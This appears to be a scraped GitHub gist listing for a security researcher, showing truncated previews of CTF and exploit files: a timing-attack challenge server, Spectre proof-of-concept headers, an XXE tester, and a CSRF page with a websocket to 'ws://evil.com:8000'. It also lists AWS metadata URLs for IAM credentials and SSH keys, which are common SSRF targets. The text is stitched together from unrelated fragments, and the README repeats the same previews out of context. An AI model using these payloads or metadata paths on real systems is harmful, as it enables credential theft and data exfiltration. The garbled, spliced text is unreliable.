netcat 0xBADCA7

## sequencehunt_server.js
#!/usr/bin/env node
// run with: node sequencehunt_server.js
// info page: http://localhost:8080/info
// correct values: http://localhost:8080/check?val0=4&val1=12&val2=77&val3=98&val4=35

var http = require('http');
var url = require('url');

var TimingAttackProtectionSeconds = 3;

## entropy.py
#!/bin/env python

import math
import sys

'''
This is a script which counts a character entropy in a single string.

Usage: entropy.py STRING

## server.asm
;; Simple TCP echo server in x86_64 assembly, using Linux syscalls
;;
;;         nasm -felf64 -o server.o server.asm
;;        ld server.o -o server
;;         ./server
;;

global _start

;; Data definitions

## waybackurls.py
import requests
import sys
import json


def waybackurls(host, with_subs):
    if with_subs:
        url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
    else:
        url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host

## index.html
<body>
<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST">
    // change admin's email
    <input type="text" name="email" value="wololo@coolmail.com">
    <input type="text" name="csrf" value="">
    <input type="text" name="change" value="Modify profile">
</form>
<iframe id="leakchar"></iframe>
<script>
const WS = "ws://evil.com:8000";

## spectre.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

## asm.s
global _time_load
global _cache_flush
global _run_attempt

extern _bools
extern _values
extern _pointers

section .text

## cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

## php_xxe_tester.php
<?php
// Extended tester from ezimuel (https://gist.github.com/ezimuel/9135151)
// The libxml entity loader is disabled by default
// even setting the libxml_disable_entity_loader to false doesn't works!
//
// @see http://uk3.php.net/manual/en/function.libxml-disable-entity-loader.php
// @see http://stackoverflow.com/a/10213239
// @see https://stackoverflow.com/questions/24117700

$dir = __DIR__;

## README.md

      
              2 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                0xBADCA7
                / README.md
            
            
              Created
              September 13, 2016 07:42
                — forked from stypr/README.md
            
              
                ASIS CTF 2016 Finals: pentest (298pt)
              
          
    pentest (298pt)

Solves: 1
This write-up was made per request of other players who were playing ASIS CTF.
Note: I solved this challenge before the hint was released. \o/
Description
	#!/usr/bin/env node
	// run with: node sequencehunt_server.js
	// info page: http://localhost:8080/info
	// correct values: http://localhost:8080/check?val0=4&val1=12&val2=77&val3=98&val4=35

	var http = require('http');
	var url = require('url');

	var TimingAttackProtectionSeconds = 3;
	#!/bin/env python

	import math
	import sys

	'''
	This is a script which counts a character entropy in a single string.

	Usage: entropy.py STRING
	;; Simple TCP echo server in x86_64 assembly, using Linux syscalls
	;;
	;; nasm -felf64 -o server.o server.asm
	;; ld server.o -o server
	;; ./server
	;;

	global _start

	;; Data definitions
	import requests
	import sys
	import json


	def waybackurls(host, with_subs):
	if with_subs:
	url = 'http://web.archive.org/cdx/search/cdx?url=.%s/&output=json&fl=original&collapse=urlkey' % host
	else:
	url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
	<body>
	<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST">
	// change admin's email
	<input type="text" name="email" value="wololo@coolmail.com">
	<input type="text" name="csrf" value="">
	<input type="text" name="change" value="Modify profile">
	</form>
	<iframe id="leakchar"></iframe>
	<script>
	const WS = "ws://evil.com:8000";
	#include <stdio.h>
	#include <stdlib.h>
	#include <stdint.h>
	#ifdef _MSC_VER
	#include <intrin.h> /* for rdtscp and clflush */
	#pragma optimize("gt",on)
	#else
	#include <x86intrin.h> /* for rdtscp and clflush */
	#endif
	global _time_load
	global _cache_flush
	global _run_attempt

	extern _bools
	extern _values
	extern _pointers

	section .text
	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
	<?php
	// Extended tester from ezimuel (https://gist.github.com/ezimuel/9135151)
	// The libxml entity loader is disabled by default
	// even setting the libxml_disable_entity_loader to false doesn't works!
	//
	// @see http://uk3.php.net/manual/en/function.libxml-disable-entity-loader.php
	// @see http://stackoverflow.com/a/10213239
	// @see https://stackoverflow.com/questions/24117700

	$dir = __DIR__;